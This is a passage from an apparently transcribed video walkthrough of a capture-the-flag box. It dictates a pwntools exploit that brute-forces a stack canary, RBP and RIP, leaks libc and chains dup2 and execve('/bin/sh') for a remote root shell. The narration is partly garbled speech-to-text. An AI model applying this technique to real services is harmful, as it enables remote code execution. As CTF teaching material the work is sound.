we're in libc receive. So right now we are in this call, I believe. So we kind of overshot it just a little bit. Yeah, so let's continue, send the message, and I'm going to restart this. So info inferior, can we still go back up? I'm just going to do ps-ef grep on, what is it? Contact. And we will attach to this. And no such program. Connection refused. So we can just run this. Set follow fork mode child, and we want to break on maybe receive. Let's see. This is where having, like, if it was either something we could hook Ghidra into GDB, then we could just right click and set breakpoints and just be happy. But it doesn't have that support. So let's see. What do I want to do? I guess we could break on write as well. So continue. So let's get out of this fork call. And we probably continue, maybe get to write. I think we're at write. Yes, we are. IO file, vprintf. Don't know where I'm at now. Still haven't got the output yet, though. So now we have the please send your message we sent. We have this call. I don't know exactly what this is calling. But we can look at the registers. This is probably to this function. FFF9A is probably calling this. So let's go into it. We move. Okay, so we're at the receive right now. So let's put the, I guess, 56As. And step here. So now we are at receive. And if we step over receive, we should hit this if then. So we were here. If we hit next, we should hit dop. So let's do that. And we don't. But we're moving this into EAX. And I'm guessing the NOP was up here. But what just happened is this is going to be the stack canary. And what we just moved was the buffer. And I forget if we did 55 or 56 A's. But let's go next. And we're testing EAX and EAX. Wait. I don't think we're exactly where I think I am. Not taken. Let's see. This is receive still. Return. Nop. Okay. This is where I thought we were. So this is now loading in the stack. So if we sent more than 56 bytes, that's going to populate RDX now. So I'm going to do SI. And if we look at what RDX is, it is this. And this is the stack canary, I believe. If we do check sec, it is. So XORing RDX against probably itself. And let's see what it's now set at. 0. So we did not modify the stack canary. And if we continue, it just says done. So let's see if we can do that twice in a row. Or maybe if I just can get it to attach, we can use the same spot. So we want to break potentially in a perfect world, if we can get back to it, right there's where we want to break. Yeah. So let's Control C out of this. Go in here. We did not. There we go. We hit breakpoint. So I think we're back in our parent right here. So this one is on the fork, so we can continue. And let's put break star this. And hope this works. Continue. We're now at write, so we're going to continue again. Enter the message we want to send to the admin. Let's do a little more A's. So instead of 56, let's do 64. Let me double thinking real quick. Let's do 58. This will probably be better. And we'll send 58 A's. And hope that that memory address stayed the same. It probably did since we didn't restart the parent. Continue. Seg fault. What? Is it still listening? Okay. So let's attach and hope it works. Let's see. Which one do we want? Maybe 11335 or 11355. That's the older one. Continue. Let's send the same number of A's. Stack smashing detected, so we didn't have any of breakpoint set. Set follow fork mode child. Let's see. I think all the memory addresses changed because a breakpoint was still there. 1, 2. But it's also possible follow fork mode child was not on. Let's attach again. Continue. We just keep crashing immediately. I guess we can restart this and hope for the best. pkill-9 contact gdb run this, send the A's, set follow fork mode child break fork, continue. Now we're at the fork call. Let's just do next 50. Where are we now? Wants to send the message. I may have jumped the gun on that. Maybe we'll send it again. Hopefully it doesn't send it twice. So next 50 again, aborted. Hopefully we get this time. If not, I'll just try explaining it and then we'll move on. It's much easier knowing how it works than actually getting the debug, since I'm not the best when it comes to GDB. Let's see, what do I want to do? Set follow fork mode, child, break on fork. Actually, we'll just break on write or receive. That's what we're breaking. Continue, send. Let's send this. And then we'll do next 10. And what, raise? Don't know where this is. Stopped. This is bothering me now. Run, set follow, fork mode, child, break, receive, continue. Send all the A's. Next. Oh, all I do is one next, and it jumps over that whole call. So that's what was happening. That makes this a lot easier. So if I step over this one up, now if we look at RDX, it is just, what is it? 400. So it's the length of whatever call it was right here. But we're going to change that with this move dword RBP minus 8. And now if we look at RDX, we should have 2 A's. 4141. So if we go back down here, echo this, and we did check sec, or Canary has been partially overwritten by 2 A's. So the exploit that we're going to do is brute force this Canary, which means we're going to send it 56 bytes and then brute force all the hex from 0 to FF. And then when it hits 00, we would have overwritten the first byte of the Canary to be what we wanted. And then we go to the next byte. And this one, we'd be brute forcing until it hits 93. And when it hits 93 and says the done message, we know we got this part of the Canary correct. And then 0A, it keeps just going down the list. 0A, this was what I was saying before. That is the enter key. So, yeah. So hopefully that kind of makes sense what we are doing. Because this is going to be painful because of brute forcing a giant 64-bit registry like 3 times, because after we brute force the Canary, we have to get to RIP, and in order to do that, we have to brute force RBP because it goes from your stack to RBP to RIP. So brute force 3 addresses. It's going to take a little while if we don't thread it. So that's why I said it's going to be painful. So let's just quit out of this, rerun GDB, and we'll just do run with no breakpoints. And let's do file, open folder, support, and we'll call this one also exploit.py once it loads. File, new file, Control S to save, exploit.py. So let's go and brute force this. The functions we probably want, for starters, from pwn import star. Then we probably want to do from concurrent import futures. This is going to be for threading. And if you want to see a video on some threading, go check out, I forget exactly what one it was. If you go to ipsec.rocks and search for rsync, if we just do, let's see, ipsec.rocks, rsync, Zeta. This is the video, the first one we do some type of threading. And this probably isn't good code to use consistently, because I am not a great coder. Doing base64 in case we need this. I'm guessing we will. From time import sleep is always good. And should be good. So our context is going to be OS is equal to Linux, and our architecture is equal to AMD 64. Then we want our host is equal to localhost. Our port is equal to leet. And then I'm going to create a class called bruteforcer. Def init self. Def init self like that. And let's do previous and result right now. So the very first thing we need is a check byte feature. So def check byte self and payload. And let's see. R is equal to remote. This is going to connect and then check it. So our host, our port, like that. Our dot receive line. Set a timeout for equals to 1. And this is going to be, let's see, nc localhost leet. We're just getting past this. And then the next is r.send payload. And then we can try. Response is equal to r.receive line. We'll give this one 1 second as well, I guess. And then we don't want any carriage returns. And say if done is equal to response, and it's probably going to be a byte because it's Python 3, r.close and return true. And then accept pass, and we'll try r.close accept pass return false. So all check byte is going to be doing is checking if byte causes program to return done. Else stat canary probably killed us. Let's put that comment one more deep. I guess that looks fine. Okay. So The next thing we need to do is probably a call to get address. And get address is going to call check byte. So self and previous. And the reason why I'm including previous is because we're going to call this multiple times. This brute force is going to be called first with previous equal to nothing, and that's going to allow us to brute force the stack canary. And then it's going to get called again with the stack canary as previous to allow us to brute force and get RBP. And then it's going to be called yet again with both the stack canary and RBP to let us get what RIP is. So that's why we have previous, is just so we can call it multiple times. Self.result is equal to nothing. Self.content is equal to nothing. And content is going to be where we store the register or data. So while the length of self.content is not equal to 8, because this piece of code is going to be running consistently until we have the full register. So run until we have the full, I guess, address. Okay, so junk is equal to 56. Oh, whoops. We'll do A times 56 plus the previous. And remember, we're saying previous is going to be things like the previous times we ran this. It'll make sense when we get there. And then probably need another variable up here. And pool is equal to false. And I don't have a good way to ever kill a thread pool in Python. I'm sure it's easy, I just don't know how. So this is kind of how I do it. We're just going to do if not self and pool and indent all this. That one too. So all this is doing is saying, hey, if I'm not told to stop, then do all this stuff. But if I am told to stop, then just return. And that's going to let all these threads come to an end completely. If we're doing something like async IO, I think in Python, we could probably stop it gracefully, but like I said, this is not good code. It would take a lot to do good code. And I'll explain it once we get to the thread pool and start writing it. But right now we're just coding everything around it. So get address, we had the junk 56 previous. Then we probably need to set self.endPool is equal to false. And this is where we're actually getting into threading. So EX for executor is equal to futures.threadPoolExecutor. And we'll say max workers is equal to 50. And then for byte and range 0x00 to 0x100, that's going to brute force just 0 to FF. Payload is equal to junk plus self.content plus the character of byte. And then I think f.arg is equal to byte and f.add_done callback self.done. So what this is going to do is start creating the job and tell this thread when it finishes, call the function done. So let's do def done. And this is going to be self and then fn for the function, if fn result. So this is saying if the thread returned true, then we will do log.debug and say byte found fn.arg, and I did the wrong bracket. Okay. Self.content plus equals character fn arg. And self.end pool is equal to true. So let's see. So def done, byte was found, append to result, content. I guess I could do better at naming variables and tell all threads to stop, or tell all jobs the work is done. Sure. So get address, that is done, and say while true. This is another bad piece of code. If self.end pool is equal to true, then we'll break out of this. And if ex dot, let's see. This is why I like Visual Studio and not doing it in Vim. So we can do work queue dot empty and length of the threads is equal to 0. Then print fail to get byte loop through everything. And I guess we can do, is it log dot error for PwnTools, and we'll break here. And this will just be sleep 1. And then let's see, return self.content. Okay, so this is going to brute force the address. So let's kind of go in Vim and explain what we just wrote. So what we have is payload is equal to 56, and this will be a times 56, and then payload plus equals, this is going to be the canary value, and then payload plus equals, this will be RBP value, and then payload plus equals RIP value. So we need to know the canary value, so our code continues. We need to know the RBP value, so we know how to get to RIP, because RIP is going to follow this. And we need to know RIP actually to leak the base address, because we'll be able to look at RIP and subtract map from RIP to equal binary difference, if I can spell, which is also equal to rebasing or ELF. And once we rebase or ELF, then we can leak GOT addresses or global offset tables. So that's essentially what we're doing. Hopefully that makes sense. Let's go back into Visual Studio, and we can now say brute force is equal to bruteforcer to define our class and say Canary is equal to bf.getAddress. And we call it with nothing because we don't have anything. It's automatically going to put the payload for 56 bytes for us. And then if all goes well, we'll do log success and say Canary is the hex of unpack64 Canary 2, 3 like that. And I guess we can run it and see what I screwed up. Right off the bat, one of the very first things I typed, from base64 import. I probably said import and I just didn't type it. Def check byte, we forgot a colon. Line 28. This is why I like doing it in Visual Studio. This try, we need right there. Let's see. F is not defined. So let's see. This is going to be... Oh, we never actually created the task. So we do F is equal to ex.submit self.check byte and the payload. So all this is doing is calling this function, and the payload we define to be right now just 56 A's plus the previous. And we're also adding content, which is a current register state. So the very first time it's going to be nothing. The second time it's going to be the first byte of the canary. The third time it's going to be the first and second byte of the canary, and so on. We can run this. And oh man, that is noisy. And I bet if we look at this netcat, there's definitely a bunch of stack smashing messages. We can enter a few times and we don't see anything, so maybe it stopped and it didn't work. I'm not exactly sure, so let's kill that real quick. Undefined variable U64, that is a PwnTools thing. I think it's my Visual Studio being wrong. Let's see. Here, I think we can set log level is equal to error, and that may suppress a lot of these messages. And then, where's done? I don't know if this log debug thing is going to work. Let's just do print. And run this again. And errors ahoy. Callback for future. I don't think it was this print statement. I think it was setting that log level. It's probably underscore. Where is it? Level. Nope, not that. We can comment out that, oh, we did comment out that print. So the only other thing I added was that log level. Okay, so let's do PwnTools remote. Let's see, what do we have? Remote. Resolving remote functions. Maybe this. Type sock host. It's gotta be a log level. Let's search level. Log underscore level is equal to error. Thought that's what I had. Log underscore level error. I wonder if they have context.log level. Just run it. Still getting a bunch. Let's just try level. Run. I think that's better. We do have a bunch of things running. I don't see anything in this output. From parent import star. If we go here, it is saying stack smashing detected. Let's see. Let's try running this. Let's quit out, get everything to a clean state, and we'll run it from here. So I can see both panes simultaneously. And the very first thing should print out pretty quickly, but I think we actually removed the print because the very first byte of the canary should be 0, 0. So that should be super easy to find. Oh, there we go. It got it. So don't need this. It may just take a minute. We can leave that commented out. So that got canary. We can say, let's just do canary, redo this, and this one will be RBP. And if we wanted to, we could even validate this canary. So if we just Control C up here, do check sec, and you can see the canary of a program matches this. So RBP is going to be the next one. So this will just do this and then canary. And this will be RBP. And then this last one will be RIP. And this can be canary plus RBP. I think these are strings right now. That's why I'm doing the unpack 64. This will be RIP. So RIP and RBP. Continue. Run this, and we'll give it probably 30 to 45 seconds. And I guess while we run it, we can go and get ahead of ourselves and do the next piece of code. So let's do stage 1, leak the addresses. This will be stage 2, rebase our binaries. And that was fast. Got them all. So if we go VMMAP and look for the very first one. Let's see. Maybe actually be the second one. Python 3, let's do print this minus this. 5474. One, 3, 7, 8. Something is off here. Continue. No, that's right. If we do hex 5474, we get 1562. So I just hate sometimes when my mind's thinking hex and it shows me an integer. But this is the start of the program. We are 1562 hex into it. So we'll just have to remember this number. And this is going to be the same. And you should always do this when within GDB, because GDB is essentially going to disable ASLR for you when you start it in GDB. But if you attach to it or just start it without GDB, a lot of this is going to be more difficult to do. So let's say difference is equal to this, or we'll call this rebase. I don't know what to call this variable. So we just won't call it anything. And we'll say base address is equal to U64 RIP minus that address. And 0x1562 pulled from VMMAP. So this is going to tell us exactly where we are in the binary. The next thing we'll need to do is load our elf. So elf is equal to elf./contact, and check sec is equal to false to get rid of the noise of it doing the check sec every time. And elf.address is equal to base address. And we can do a ROP table. So ROP is equal to ROP elf. And this is going to be the PwnTools way to create a ROP chain. If you watch the patents video, we did it manually, and if I have time, I'll do it manually after this. But I want to show kind of both ways. And I show both ways in the Bitterman video, which is a good, I guess, maybe introduction to this stuff that's in a more digestible format, since I prepared a lot more to do that. So started, we built a ROP table. So let's see. We can begin stage 3, which is going to be leak the libc address. And we'll do that with a write. And we want the file descriptor, which I think is going to be 4. If I go here, Control C, process info, or process status. Right now, it's at file descriptor 3. When it creates the fork, it'll go up 1 to be file descriptor 4. So write to file descriptor 4, which is going to be the future socket. And then we want to write the address elf.got, write, and that's going to leak where it is in libc. And the length is just 8 bytes. So this prevents us from having to do ROPR and do all this manually. It's just magic. So in order to perform this syscall, we just do rop.write 0x4 elf.got write 0x8. It's super easy, barely an inconvenience. So R is equal to remote, R host, R port, level is equal to error. And then we want to do our receive line, timeout is equal to 1. And then we create our chain with just chain is equal to ROP.chain. And then probably chain is equal to chain.decode. And this is just something I know from doing PwnTools on Python 3 is this chain is going to be in binary format or a byte format. So we decode it, use Latin 1 because we'll get UTF errors if we don't. And now we just do r.send the prefix plus the chain. And I don't think we defined prefix. So we should do that. Do we have it up here? Prefix, we don't. So prefix is going to be the junk, Canary, and RIP. So let's go. What do we want to do this? Maybe rebase a binary is a good spot to do it. So or I have to leak all the addresses. So prefix is equal to F junk Canary RBP. So now we can get there. We write our chain there, and we can say write underscore libc is equal to u64 r.receive the first 8 bytes, which is a memory address. So log.success leaked right at libc and hex write libc. We can also, for like the first run, say, I guess before this chain we can do it. Log.success, or we can do log.info and put ROP chain write and do ROP.dump like that. And we probably should do log.infos throughout the code. Stage 3, leaking libc address. We don't have to do one for rebasing binaries. I guess it's fine. So we can continue, run the exploit, and I think this time I'm actually going to just copy the values, and then we can just paste them in every time because it's taking like 45 seconds per run to get all these addresses. So we don't have to wait since everything's going to be the same until we restart this process. So let's start that. Let's see. Stage 0. Use previous values. Canary is equal to P64. Decode Latin 1. And this will be RBP, RIP. And junk was not defined. So that's why we're doing this. So we don't have to wait. Okay, so all I'm going to do, copy all of this. Actually, as long as we don't call this, we don't have to worry about it. And just comment this out. Whoops, KU on comments. So let's do KC there to comment. Highlight all this, Control KC to comment the whole block. And we don't want this prefix commented. And junk is not defined there, so junk is equal to A times 56. Maybe I defined it somewhere else. So now when we run this, should be pretty instant. And I forgot to do something here. We forgot to put it in curly braces. Boom, and we probably have libc's address right there. But you can see, let's do \n, the ROP chain. And we actually don't need this first 4, or the first 16 bytes of this payload, because our return address is not a return. RDI after the fork call is actually going to be set at 0x4. So we don't have to manually do this one. And it would be more stable if we didn't, because if someone else is on this server and leaves a connection open, then our file descriptor could be 5. So yeah, we may want to later improve our stability by changing that. We'll do that after we get the very first shell. So what I'm going to do is make sure my libc address is correct. So Control C, copy this address, and look at it. And what do you know? We are in libc's right. So that address was leaked successfully. So the next piece is stage 4, and this is the cool stage of getting code execution. So log.info, begin code execution, call it stage 4, and this will start with a or actually, before we do that, we probably have to load libc and rebase it. So loading libc. libc and rebasing. So now that we know where the write is, we can load libc just like we did up here and get it working. So let's do libc. I don't know if I like that naming convention, but okay. Elf, and we probably should copy it here. So locate libc.so.6, and we want the 64-bit. So libc.so.6. We'll call it .cali. Okay. So libc.so.6.cali. We'll do elf underscore libc. Elf underscore libc.address is equal to write underscore libc minus the elf libc symbols write. So this is just going to set our address in libc. So we're doing all the rebasing automatically. And ROP libc is equal to ROP elf libc. And because we did the rebasing this way, all the ROP calls are going to be in the correct locations. So the last piece we need is binsh's address. So binsh is equal to next elf libc.search, and then /bin/sh a null byte dot encode. You have no idea how long it took me to troubleshoot PwnTools 3 of trying this libc.search function. And the issue was it needs to be a byte. So the dot encode. That was a pain to troubleshoot. So now we should have everything. We could print out the address if we wanted to and verify, but I mean, I'm confident it works. So stage 5, do the, we'll say get code execution. RCE time. So what we're going to have to do is 2 different dupe2 calls. So we're going to have to do dupe2 4 and then 0 for standard out. Dupe2, whoops, 4 1. So this is going to duplicate the file descriptor socket into 0 and 1 for standard in, standard out, which is letting us actually interact with what we're going to execute. And then after that, we want to do probably ExecVE and then bin sh. And if you looked at the syscall, you do 2 nulls afterwards, I believe. So let's create this ROP chain, which will be super easy. So ROP underscore libc dot dupe2 0x4 0x0. Do the same exact thing except 0x1. And then we do ROP libc execve bin sh 0x0 0x0. I mean, it pretty much documents itself with how you do these calls. So we can do log.success and then say ROP chain is equal to ROP libc.dump. So you can see what the chain looks like. Let's get rid of the one up here. We can just put this to log debug. Shouldn't see that. It just fills up standard out, and I just don't care for it. So, yeah, let's try sending it. So let's copy our send. We will delete that line. Chain is good. That is good. So we can copy all this. Send. Don't need that. And then r.interactive. And we can hope for the best. Python 3 exploit.py. It's loading the gadgets. ID did not work. I don't know what these bytes got printed. That was weird. Do we have a print somewhere? We send this. That's the chain. Is that going to happen again? For science? Yes. Let's see. Doesn't like something we're doing. Prefix chain. Looking at this. Let's do ROP chain \n. I bet that's the bin sh address that got screwed up. We probably did something wrong there. No, that's right here. So let's see. So RDI we're putting to 4. And then RSI, the second argument, we're putting to 0 and calling dupe2. So dupe2 for 0, dupe2 for 1, execve, probably bin sh 0 0. So let's do x/s on that. That is bin sh. So let's see. Our receive line. Let's just put a log info sending. Log info sent. And then interactive. So right when we go interactive is when that happens. LibC so Cali. Well, if LibC wasn't correct, then BenSH wouldn't have matched up like that. And I'm an idiot. This is ROP LibC. We're sending the old chain. So we're leaking the address of write, and that's what this is. This is the leak address of write because I didn't update my variable name when I was copying and pasting everything. So Python 3 exploit.py ID, and we have code execution locally. So that is the good news. The bad news is getting it on the server takes quite a bit of time. So let us just save that and let's see. Let's uncomment in stage 1, KU while holding control, and highlight this, KC to comment that, save. We'll also have to edit our host to be, it's actually not listening on lead. It's listening on nothing. So we have to go in SSH, and there's two things we could do. We could do -L and do the port forwarding this way, but I'm actually not, because if we host something up, we're in SSH's process and we'd have to completely revert the box. However, if we did this from, if we did it from like Chisel, then we don't have to worry about that. So let's grab Chisel and run it. So locate Chisel, and I'm just going to grab this one, and we can do scp-i ROP r4j at 10.10.14 or 10.10.10.148. That colon. So let's see. It's copying over. So again, if we screw up, we can kill the chisel process, which kills all the sockets tied to it. If we're doing SSH, we can't kill SSH, and it may just keep zombie sockets alive, which just hoses the box and we can't get back in, and it's bad news bears. So that's why we're doing this. Let's see. If you don't know what Chisel is, my Reddish, REDDISH video should help a lot. We want to do reverse. Do I not have it here? Copy Chisel in this directory. Server reverse. ADA is already being in use. I thought it was 1080 by default. Huh. chmod +x, Chisel, and let's see, this is going to be client 10.10.14.3, 2, and our IP, I think we can do port like that. R for reverse, 1338.127.001.1337. Connecting, fingerprint, good. So now, if I do netcat localhost 1338, It goes through chisel, and we get this message. And that is slow. So you can see like a full second there, almost instantly there. So we're going to change our timeouts in our script as well. So localhost, our port is 1338, server, and let's see, 1337. This will be local. And I'm also going to see if I can speed this guy up. So SSH-I ROP, I think it's John that has HTTP server running. So 10.10.10.148. Let's see if we can speed this up any. ps-ef grep HTTP. We have a few threads running. Let's just kill them and see what happens. It's not behaving any better. I think this box is just single threaded, and that's where a lot of these issues come from. Let's see. 1256. Yeah. That's got a capital G. This is still going slow. Kill -9 1556. One 676 1754 4312. I probably could have done like p kill -9, but oh man, that's actually behaving better. NC localhost 1338 feels like it's better. Yeah, that's definitely much more tolerable. So what were we doing? Oh, we gotta grab libc. Let's go SSH back in and locate libc.so.6. It's probably this guy here. So let's go into support scp-i rope John at 10.10.10.148. Oh, I don't know. It's .cali is what I have, right? Yeah. So libc so6, and we'll say .target. And we can go back here and say libc is equal to libc.so.6.target. And where do we reference it? Right here. So elf libc. Okay. And 50 workers is probably going to be a little too many. We can probably set it to, I'm just going to do 5. And we're just going to let this run, and it takes quite a while. Start from this one, SHSI, John at 10.10.10.148. Watch -n1. We'll do, yeah, 1 here. And ps-ef grep on contact. And we'll pipe that to wc-l. This is just going to show us how many threads we have going on simultaneously. So Python 3. Let's make sure exploit is set correctly. 1338. libc is the right one. So here goes nothing. Python 3 exploit.py, run it. And we can see it goes up a little bit. We could try more threads to speed this up, but it's definitely not something you want to give way too many threads on. So just going to speed up the video and we'll give it probably 5 to 10 minutes. So I'm not sure this is actually working. So I'm going to kill this, as much as I hate to waste the time it was running. And I want to definitely put this comment back. And we can do right here, log info, grabbing Canary. This will be grabbing RBP. And this will be RIP. So let's now change the workers. Let's just do 2. This should definitely be safe. See. Guess we can run this again. Found the first byte as 0, so that is definitely good. For some reason, the logger didn't work. I guess maybe we're not at informational level. Not sure, but we got the second one. So here we can just speed up the video, hopefully, and we may get lucky. So this takes a while. And it's now loading. We sent the payload, and here's the moment of truth. Does ID work? It does. So first try, we got this. If we do hostname, we are on rope. And we can do wc-c root.txt to prove, yes, we can, in fact, read this file. So hope you guys enjoyed that whole path. Let's now get away from doing this remotely and go back to doing it locally on our box, because the threading is so much nicer when we have multiple cores and everything. So this is where I wanted to be, I think. And let's see. We can comment stage 1 out again with KC and do KU here to uncomment this. And let's make sure our exploit works real quick by just, oh wait, it's not going to work because we have to change this. And we also change libc to b.cali. Now if we Python 3 exploit.py, oh no. Save. Did I not comment out the right thing? Stage 1. I must have, oh, I didn't comment everything. KC, there we go. Run this. ID does work. So what we want to do is stop at the leak real quick. And we're going to show what happens after that fork. And pray we don't ruin the binary and have to brute force this. But locally, doesn't really take too long. So let's set follow exec mode to be child. What? Set follow fork mode to be child. I don't know what I was thinking there. And let's just break on fork. Continue. And let's see. Is that the very first one we're doing? We have stage 0, not making a call. Yes, that is the first one. So if we just run our exploit script, I guess it timed out, which is fine. And get out of this fork call. So, oh crap, I just hit C. Let's see if we can go up real quick and see what it said. So remember, get UID. This is the very first part of handle request, right? Yeah. So this is where we had been. So if we keep going up a little bit and look at the registers there, let's see. It looks like it's not set yet. Well, that's a bummer. Let's see. ps-ef grep contact. Hopefully we can attach here. Where are we? Let's just set follow fork mode child break on. Do we still have the break on fork? I think we do. Run the exploit. Let's get out of this. So step, not C, S. And this is where we get into the first function. Is it set here? It's not yet. I'm pretty sure by the time, I guess this one sets it in this function. So the get UID, we can do next to step over it. This is a call to printf. So we are right here. So we can do next to step over this. Then we get a call to string length, which is this one. So we can next to step over that. Got right. Step over this one. And now we are going into this function, which maybe handle message. I think that's what we called it before, actually. But okay. So we get in here, and let's do S to step inside. Now we're in handle message, and if we look at RDI, the very first argument, it is already set at 0x4, which is the file descriptor. So we attach again, set follow fork mode, parent, info B, delete 1, continue. So what we can do is purposely break our code. So we want to do ROP write 0x8. So now we won't be able to leak LibC. Hopefully. Stage 3, leaking LibC. If this was 4, it leaks. 8, it does not. So what we want to do is change this back to success and look at the ROP chain we build. We want to remove 8 bytes and 16 bytes. So 8, 8 to get rid of this whole call. And we can do that with Python. And this is probably the ugliest code. So print A, B, C, D, E, F, G. Let's do x equals So if I just do X, it prints this. If we do X2 colon, prints everything after 2. So what we want to do is 16 to take out the first 2. So chain 16 colon, remove the Pop RDI 0x8 thing. Pop RDI return, I guess we can say. So now, if we run our exploit.py, we still leak libc despite whatever our file descriptor is set at. Because again, it's going to ignore that call. So even though we're writing this whole ROP chain, these first 2 things are removed. And probably sometime down the line, I'll try to see if I can add like a way to just do null here and have it skip the call. But right now, I don't think PwnTools supports that. But it shouldn't be too hard to add something like that to skip registers. And could be handy. So this next one is going to be a little bit trickier. So let's KU to uncomment everything. And where's chain? So we don't have to send this ever. So we can just uncomment or comment that. And we are already printing this ROP chain. We can remove that one and examine this chain. So we actually got to remove stuff out of the middle of this. So we got to remove these 2. So this is going to be 16 to 32. And then the next one we'll have to remove will be this one. So this is not going to be code I am proud of, but hey, it's going to work. So it's not stupid code if it works. Again, I'm just setting these registers to something that should not work. So we can save that. And then the chain, we'll do chain 1 is equal to chain 16. This is going to skip grab everything up to 16. And chain 2 is equal to chain. This one will be 32. And 32 goes on this side. So what we just did was 16 is grabbing this. And 32 is grabbing this. So we're grabbing everything but these 2. So chain is equal to chain 1 plus chain 2. And this is remove first dupe. First pop RDI and dupe to std, I think out call. Maybe it's stdin. Can we just man std out? Is this 0 or 1? File descriptor. stdin is 0, std out is 1, std error is 2. So this one is stdin. And then the next one is going to be std out. So chain 1 is equal to, so 8, 16, screw those, 40. Think that. And chain 2 is equal to chain 56. Chain is equal to chain 1 plus chain 2. And maybe it'll work. Run this, ID, and we still get code execution, despite this definitely being wrong. And that's again because that register was already set and we just reused it. So if we wanted to manually do all this exploit, we can do that. So let's just cp exploit.py to manual.py, and we will begin doing that. Going over to Visual Studio, we can probably open up manual.py, close out of exploit, and begin. I deleted too much, I think. Oh, we don't need, these comments. So that should be fine. This brute force thing, I guess we can get rid of it to clean up. There we go. We can get rid of this because we won't be using it. So we didn't really take advantage of PwnTools to get to here. Rebasing our binaries. This is, instead of doing elf.address, we can create a function. So we can do def bin address addr is equal to return addr plus, what is it? Bin underscore base. We probably want to copy that to put it here. And this is base address. Okay. You could also do something like lambda bin addr plus base address or something. But I just find those functions hard to read. So just because you can do it on one line doesn't mean you should always do it on one line. So that's that. We can get rid of this, and we're not loading the elf because we want to do this the hard way. And we can get rid of the ROP call. So what we have to do is now everything manually. So ROP.write, can't do that. We have to pull out all the pop addresses. So wrapper search pop question mark, and file is contact. And we want, I think it's RDI, RSI, and RDX is the register calls. So let's see. Pop RDI is equal to 0x, like that. Then we want pop RSI R15 is equal to this. We don't need all those zeros. Kind of line these comments up. And the final one, in case we want it, is RDX. And we will want it. So pop RDX, paste, and line these comments up. And this isn't exactly where everything is. We have to do bin addr on each of these. To get it to the location. I hope. So let's see. This will go up here. So now we have to get the write address. So I think I can do this via object dump -d contact grep write. Write is probably at 1050. So write, we'll say this one is plt write is equal to bin addr 0x 1050. I think this is right. I forget how to get the GOT. grep-i write. Still not exactly what I wanted. Read elf-s on contact grep-i write. Why is it all zeros? How is PwnTools getting this? I guess we can try 4028 and hope for the best. This is a bit harder than I expected. So let's see. Thought I had a manual here. Maybe not. So, was it? Did I call it PLT something? Okay, we'll redo it. PLT write bin addr. This is GOT. And this was read elf-r contact grep write, and then plt write is equal to bin addr 0x this was just object dump -d contact cd support object dump -d contact. Oh, crap. I wasn't doing it in Vim. I was doing it over here. 4028. GOT 4028 GOT write. And this is read elf-r, and this is object dump -d. So hopefully those all work. So now we can build the ROP chain. So what we want to do is ROP plus equals, and this will be write, and we'll do null for nothing because we don't want to overwrite that socket address, which is 4. And then after that, it's going to be GOT PLT, I believe. Do I have the chain written? Chain. Yeah. So ROP plus equals pop RSI R15. And then ROP, we can do plus 0x0. No, this is R15. So we're popping this, and we have to put the value for RSI, and the value we want for RSI is GOT write. And then we want the null value because we don't care about R15. So ROP is equal to that. Then the next thing we need to do is call PLT write. Write null. Oh, we have to do ROP plus equals pop RDX plus 0x8 for the length. And again, we're not doing the RDI one at all because we don't want to set it. If we did want to set the file descriptor, we just do pop RDI plus 0x4. So I think that is right. KC, we can get rid of all this and plus ROP. And it's probably, we'll have to do some like U64 stuff and get this properly formatted. So Python 3 manual.py. Yeah, so r.send ROP is currently an integer. So we do U64. Will that work? No, nothing says encode. Let's see. String, not bytes. So this will probably be .decode Latin-1. And did not work. So looking at this, let's just take this decode out and take this ROP piece out like that. And wonder what happens if I just put the P64 in this command. F5 Python file. Let's see. Can't concat int to bytes. What are you? B, and that. So I wonder if we can just do encode. Will that actually work? Let's see. I don't think it's that. This wouldn't make much sense to do it this way, because I would just be putting the string on the stack. So, is it hex? Or maybe it needs to be a memory address, so P64, the packet. That looks right. Okay. So now we should probably have ROP is equal to ROP.decode Latin1. So that should convert this into a string, which then we can use to concat the two things it was trying to. And there we go, leaked libc address. So that is good. So clean this up. libc. And I guess we could go and double check by just Control-C, /x, libc, right. That looks good. Continue. And now we'll have to pretty much do the same exact thing, but rebase libc and then do all these calls. So let's see. We can do log info, calculating libc offset, and we don't load libc anymore. And the libc base is going to be equal to write libc, and then we have to get the address of this write call. So go back here, object dump -d libc.cali grep-i write, and let's see, maybe write @ we want to grab, and I think this is the address, __ write glibc. So minus that. And this was pulled via object dump -d libc. Okay. We can pretty much copy this and move it down here to do a rebase. This will be libc address is equal to that plus libc_base. So now all we have to do is grab all the calls. So let's see. Can we do strings? Is it AXTR? .cali? Is it FR? Let's see. It's something like that. Strings print hex. Maybe hex location. Let's see. Strings hex location. Linux. Let's see. Strings, we want all. And maybe bytes. No, that's not it. Print the location of the string. So AT, we want it in base 16. So X, and then probably, I don't know what F and R do. Let's see, does that do anything or is it just ATX? I'm just going to do ATX. I'm probably misremembering the command. So grep bin sh. So there we go. So bin sh is equal to libc addr 0x that. And this was done by strings -at x on libc. So the next thing we need to do is find where dupe2 is. So probably object dump again. -d dupe2 grep, or not grep, libc.cali, and let's see, grep dupe2. And we probably want this one. So dupe2 is here. So dupe2 is equal to libc addr 0x, and we'll say this is object dump -d libc. And then we probably want ExecVE is libc addr, and the same exact thing, ExecVE, and we'll do CB130. Object dump -d libc. So we should have all those locations, and hopefully they're right. And we can begin doing our ROPing. So let's do ROP is equal to, and the first call is going to be dupe2. So we're not going to worry about RDI, the first register, because we're assuming the file descriptor is already set. So it was pop RSI R15 plus, how do we do this? Address, and then that. So this is going to be dupe2. We'll say 4, which is really null, 0. Yeah, it was just 2. So this will be P64 0x0 plus P64 0x0. This second piece doesn't matter. That's again because we're doing the RSI 15. So this would be for STD in, I believe. And then ROP plus equals. This will be 1 for STD out. And then ExecVE bin sh null null, and this is the one we'll use the RDI value. So we can do ROP plus equals dupe2. We actually have to call them, and now we can do ROP plus equals Pop RDI plus bin sh ROP plus equals we did do ExecVE, and ROP plus equals Pop RSI R15 P64 0x0, because these next two should be null. And we're saying a third argument, so we can do it. Pop plus equals RDX, Pop RDX plus P64 0x0. So let's see. That should be the chain. So maybe it will work, maybe it won't. I think it will. So prefix plus ROP. Python 3 manual.py. Let's see. Can only do strings, not bytes. We screwed something up. How do we send ROP? Oh, we need to do ROP is equal to ROP.decode Latin 1. ID. Hey, it works. We did it completely manually. So again, let's see. I guess we can go over the code real quick. And then we move into the other binary, which was the printf. So starting up, just loading all the variables. That's easy. This is, again, using the variables we had before, which was the canaries. Base address, we're calculating. This is portal from VMMAP. And then we just create a little function to return the relocation addresses. So when we do Pop RDI, the very first thing is leaking the LibC address. And we do this through write and... Oh, this is just setting up variables. Here it is. So these were all done through Wrapper. We can put Wrapper like that. And then 